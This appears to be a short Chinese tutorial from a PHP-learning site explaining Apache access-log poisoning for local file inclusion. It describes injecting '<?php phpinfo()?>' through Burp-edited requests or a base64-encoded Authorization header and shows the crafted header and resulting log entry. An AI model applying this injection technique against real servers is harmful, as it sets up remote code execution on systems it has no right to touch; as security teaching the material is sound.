网站地图    收藏   

主页 > 后端 > 网站安全 >

Apache日志中嵌入php脚本的两种方法(在LFI中使用

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 参考文章:Apache日志绕过URL编码方法 :http: www 2cto com Article 201405 304298 htmlps:其实上面的参考文章中有错误之处,即在浏览器中直接访问时加上?php phpinfo()?这样的代码会在日志文件中被...

参考文章:Apache日志绕过URL编码方法 :http://www.2cto.com/Article/201405/304298.html

ps:其实上面的参考文章中有错误之处,即在浏览器中直接访问时加上<?php phpinfo()?>这样的代码会在日志文件中被url编码是因为浏览器自动进行url编码造成的,因此只要通过burp将其修改回来即可。

简介:Apache的日志默认存储在安装目录下的logs文件夹下,主要有访问日志和错误日志。在Windows下这两个日志文件为access.log和error.log,Linux下是access_log和error_log。其中access.log/access_log访问日志记录了所有对Web服务器的访问活动。格式如下:

 
192.168.5. 66- - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876
 
1.远程主机、2.空白(E-mail)、3.空白(登录名)、4.请求时间、5.方法+资源+协议、6.状态代码、7.发送字节数
方法一:

即在浏览器中直接访问,然后用burp抓包,将编码的部分修改回来即可。

20140508215013

20140508215346

方法二:

利用HTTP HEADER中Authorization字段,该字段是用来发送用于HTTP AUTH认证的信息,其值的格式为”Basic base64(User:Pass)”。据此,我们重新构造payload如下:

 
URL地址:http:// 192.168.5.115/test.php
 HTTP HEAD中添加:Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=
注:PD9waHAgcGhwaW5mbygpPz46MTIzNTY==为base64(<?php phpinfo()?>:12356) 利用此方法可成功将正确的PHP代码写入日志如下:

192.168.5.115 – <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] “GET /test.php HTTP/1.1″ 200 2735

20140508215629

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论